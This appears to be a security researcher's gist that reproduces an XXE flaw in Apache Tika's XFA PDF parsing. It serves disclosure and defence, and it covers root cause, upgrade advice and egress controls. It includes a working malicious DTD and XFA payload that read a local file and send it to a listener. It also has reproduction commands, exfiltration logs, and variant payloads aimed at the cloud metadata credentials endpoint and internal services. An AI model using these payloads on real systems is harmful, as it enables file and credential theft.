@N3mes1s
Last active December 10, 2025 08:06
CVE-2025-66516 - Apache Tika XXE Out-of-Band Data Exfiltration

Apache Tika XXE Out-of-Band Data Exfiltration

Summary

  • Product / Component: Apache Tika (tika-core + tika-parser-pdf-module) - XFA PDF Parser
  • Impact: An unauthenticated attacker can exfiltrate any local file readable by the Tika process from a system that parses a malicious PDF. The data is sent to an attacker-controlled server via HTTP requests, which enables "blind" XXE exploitation where parser output is not visible to the attacker. The same mechanism enables SSRF against internal services (cloud metadata endpoints, internal APIs).
  • Severity: Critical (CVSS 9.8 per GHSA)
  • Affected Versions: tika-core 1.13 - 3.2.1, tika-parser-pdf-module 2.0.0 - 3.2.1
  • Fixed: Apache Tika 3.2.2 (commit bfee6d5)
  • Reproduction Status: CONFIRMED (Tika 3.2.1, OpenJDK 21.0.9, Ubuntu 22.04)
  • Identifiers:
    • CVE-2025-54988
    • CVE-2025-66516
    • GHSA-f58c-gq56-vjjf
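
For quick triage, the affected ranges listed above can be checked programmatically. The following is a minimal sketch, not an official tool: the names `AFFECTED`, `parse_version`, and `is_affected` are hypothetical, the ranges are copied from this summary, and only plain numeric versions are handled (qualifiers such as `-BETA` are out of scope).

```python
# Affected ranges as stated in the summary above (inclusive on both ends).
AFFECTED = {
    "tika-core": ("1.13", "3.2.1"),
    "tika-parser-pdf-module": ("2.0.0", "3.2.1"),
}


def parse_version(text: str) -> tuple[int, ...]:
    """Turn '3.2.1' into (3, 2, 1), padding short versions like '1.13' to three parts."""
    parts = tuple(int(part) for part in text.split("."))
    return parts + (0,) * (3 - len(parts))


def is_affected(artifact: str, version: str) -> bool:
    """Return True if `version` of `artifact` falls inside the listed range."""
    low, high = AFFECTED[artifact]
    return parse_version(low) <= parse_version(version) <= parse_version(high)
```

For example, `is_affected("tika-core", "3.2.1")` is true while `is_affected("tika-core", "3.2.2")` is false, matching the fixed version given above.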

Root Cause

Apache Tika's PDF parser hands XFA (XML Forms Architecture) content to the Xerces XML parser with external entity resolution enabled. When Tika processes a malicious PDF whose XFA form carries a DOCTYPE declaration referencing an external DTD, the following happens:

  1. Tika parses the PDF and encounters the embedded XFA XML
  2. Xerces resolves the external DTD from an attacker-controlled server
  3. The DTD defines parameter entities that:
    • Read local files via file:// URIs (e.g., /etc/hostname, /etc/passwd)
    • Construct a URL containing the file contents as a parameter
  4. Xerces makes an outbound HTTP request to http://attacker/?data=<file_contents>
  5. The attacker receives the exfiltrated data in their server logs

Key vulnerability characteristics:

  • Works in "blind" scenarios where parser output isn't returned to the attacker
  • Silent exfiltration via network - no visible indication in parser output
  • Can target any file readable by the Tika process
  • Enables SSRF to internal services (AWS metadata at 169.254.169.254, internal APIs)

The fix in Tika 3.2.2 disables external parameter entity resolution for XFA parsing, preventing the DTD fetch and subsequent data exfiltration.

Attack Chain

┌─────────────────┐     ┌──────────────────┐     ┌─────────────────┐
│ Malicious PDF   │────▶│  Apache Tika     │────▶│ Attacker Server │
│ with XFA + DTD  │     │  3.2.1           │     │ (port 8888)     │
│ reference       │     │                  │     │                 │
└─────────────────┘     └──────────────────┘     └─────────────────┘
                              │                        │
                              │ 1. GET /evil.dtd       │
                              │───────────────────────▶│
                              │                        │
                              │ 2. DTD with entities   │
                              │◀───────────────────────│
                              │                        │
                              │ 3. Read /etc/hostname  │
                              │   (local file)         │
                              │                        │
                              │ 4. GET /?data=<hostname>│
                              │───────────────────────▶│
                              │                        │
                              │     EXFILTRATED!       │

Reproduction

Prerequisites

  • Java 17+ (tested with OpenJDK 21.0.9)
  • Python 3.x (for HTTP server and PoC generator)
  • Git
  • Network connectivity (or localhost testing)

Automated Reproduction

# Run the reproduction script
./repro/reproduction_steps.sh

The script:

  1. Clones the public PoC from https://github.com/mgthuramoemyint/POC-CVE-2025-54988
  2. Downloads tika-app-3.2.1.jar from Maven Central
  3. Generates a malicious PDF (malicious_oob.pdf) with an embedded XFA form and an external DTD reference
  4. Creates evil.dtd, which reads /etc/hostname and sends its contents to localhost:8888
  5. Starts a Python HTTP server on port 8888 to serve the DTD and capture the exfiltrated data
  6. Executes Tika against the malicious PDF
  7. Verifies the exfiltration by checking server logs

Manual Reproduction

  1. Create the malicious DTD (evil.dtd):

    <!ENTITY % file SYSTEM "file:///etc/hostname">
    <!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8888/?data=%file;'>">
    %all;
  2. Create a PDF whose XFA stream contains:

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [
      <!ENTITY % dtd SYSTEM "http://127.0.0.1:8888/evil.dtd">
      %dtd;
    ]>
    <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">&send;</xdp:xdp>
  3. Start the listener:

    python3 -m http.server 8888 --directory /path/to/dtd/
  4. Parse the PDF with Tika:

    java -jar tika-app-3.2.1.jar malicious.pdf
  5. Check the listener logs for exfiltrated data

Evidence

Listener Log (logs/listener_20251209-152555.log)

127.0.0.1 - - [09/Dec/2025 15:25:57] "GET /evil.dtd HTTP/1.1" 200 -
127.0.0.1 - - [09/Dec/2025 15:25:57] "GET /?data=lima-pruva-ghsa-f58c-gq56-vjjf-apache-tika-xxe-oob-e-20251209134317 HTTP/1.1" 200 -

Analysis:

  1. First request: Tika fetched evil.dtd from the attacker server
  2. Second request: Tika sent the contents of /etc/hostname (the VM hostname) in the data parameter
  3. Both requests occurred within the same second, demonstrating immediate exploitation
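
The check described in the analysis above can be automated. The sketch below is one possible way to pull the exfiltrated values out of a listener log in the `http.server` format shown; the function name `exfiltrated_values` and the regular expression are illustrative assumptions, not part of the original reproduction script.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Matches the request line that http.server writes, e.g. "GET /?data=x HTTP/1.1".
REQUEST_RE = re.compile(r'"GET (?P<target>\S+) HTTP/[\d.]+"')


def exfiltrated_values(log_text: str, param: str = "data") -> list[str]:
    """Collect every value of the `param` query parameter seen in GET requests."""
    values = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a GET request line
        query = urlsplit(match.group("target")).query
        values.extend(parse_qs(query).get(param, []))
    return values
```

Run against the two log lines above, this returns a single value, the VM hostname; the `/evil.dtd` request carries no query string and contributes nothing.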

Environment

  • Java: OpenJDK 21.0.9
  • Python: 3.10.12
  • OS: Ubuntu 22.04 (Lima VM)
  • Tika Version: 3.2.1 (vulnerable)

Artifacts

  • Malicious PDF: artifacts/tika-oob-runs/run-*/payload/malicious_oob.pdf
  • Evil DTD: artifacts/tika-oob-runs/run-*/payload/evil.dtd
  • Listener logs: logs/listener_*.log
  • Tika output: logs/tika_*.log
  • PoC source: artifacts/POC-CVE-2025-54988/

Real-World Attack Scenarios

Scenario 1: Document Processing Service

An organization uses Tika to extract text/metadata from user-uploaded PDFs. An attacker uploads a malicious PDF to exfiltrate:

  • AWS credentials from ~/.aws/credentials
  • Environment variables containing secrets
  • Application configuration files
  • Database connection strings

Scenario 2: Cloud Metadata SSRF

An attacker crafts a DTD that requests the cloud metadata service:

<!ENTITY % file SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

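This enables credential theft from cloud instances running Tika. The URL shown is the AWS instance metadata path, which answers plain GET requests only where IMDSv1 is still enabled; the GCP and Azure metadata services additionally require a custom request header.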

Scenario 3: Internal Network Reconnaissance

Use XXE to probe internal services:

<!ENTITY % file SYSTEM "http://internal-api:8080/health">

Map internal infrastructure and identify additional attack surfaces.

Recommendations

Immediate Mitigations

  1. Upgrade to Tika 3.2.2 or later

    <dependency>
        <groupId>org.apache.tika</groupId>
        <artifactId>tika-core</artifactId>
        <version>3.2.2</version>
    </dependency>
  2. If upgrade is not immediately possible:

    • Disable XFA parsing entirely via tika-config.xml
    • Implement network egress filtering to block unexpected outbound requests
    • Run Tika in a sandboxed environment with no network access
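
Whether egress filtering or a no-network sandbox is actually in effect can be verified from inside the environment that runs Tika. The following is a minimal sketch using only the Python standard library; `can_connect` is a hypothetical helper name, and the hosts and ports to probe are up to the operator.

```python
import socket


def can_connect(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within `timeout` seconds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts, and unreachable networks.
        return False
```

In a correctly isolated sandbox, a call such as `can_connect("169.254.169.254", 80)` or a probe of any external host should return `False`. A `True` result suggests that the DTD fetch and the exfiltration request described above would also get through.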

Defense in Depth

  1. Network Controls:

    • Block outbound HTTP/HTTPS from document processing services
    • Implement allow-list for necessary external resources
    • Monitor for unusual DNS queries or outbound connections
  2. File System Isolation:

    • Run Tika with minimal file system permissions
    • Use containerization with read-only root filesystem
    • Mount only necessary directories
  3. Input Validation:

    • Scan uploaded PDFs for suspicious XML structures before processing
    • Implement file size limits to prevent resource exhaustion
    • Consider using a separate, isolated service for PDF processing
  4. Monitoring:

    • Alert on Tika processes making unexpected network connections
    • Log all outbound requests from document processing infrastructure
    • Monitor for access to sensitive files
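
As an illustration of the "scan uploaded PDFs for suspicious XML structures" item under Input Validation, the sketch below flags PDFs that reference XFA and contain DTD markers. It is a heuristic under stated assumptions, not a complete detector: the names `suspicious_markers` and `should_quarantine` are hypothetical, only raw bytes and Flate-compressed streams are inspected, and content hidden behind other filters, object streams, or encryption will be missed.

```python
import re
import zlib

# DTD constructs that a legitimate XFA form normally has no reason to contain.
MARKERS = (b"<!DOCTYPE", b"<!ENTITY")
# Captures the raw body of each PDF stream object.
STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.DOTALL)


def _inflate(data: bytes) -> bytes:
    """Try to Flate-decompress a stream body; return b'' if it is not zlib data."""
    try:
        # decompressobj tolerates the trailing end-of-line bytes before 'endstream'.
        return zlib.decompressobj().decompress(data)
    except zlib.error:
        return b""


def suspicious_markers(pdf_bytes: bytes) -> set[str]:
    """Return the DTD markers found in the raw file or in any inflated stream."""
    views = [pdf_bytes] + [_inflate(m.group(1)) for m in STREAM_RE.finditer(pdf_bytes)]
    return {
        marker.decode("ascii")
        for view in views
        for marker in MARKERS
        if marker in view
    }


def should_quarantine(pdf_bytes: bytes) -> bool:
    """Flag PDFs that both reference XFA and carry DTD markers."""
    return b"/XFA" in pdf_bytes and bool(suspicious_markers(pdf_bytes))
```

A check like this is best treated as an additional signal in front of the parser. It does not replace upgrading to a fixed Tika version.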

References

CWE Classification

  • CWE-611: Improper Restriction of XML External Entity Reference
  • CWE-918: Server-Side Request Forgery (SSRF)
  • CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

Report Generated: 2025-12-09
Reproduction Status: CONFIRMED
Idempotency Verified: Yes (multiple successful runs)
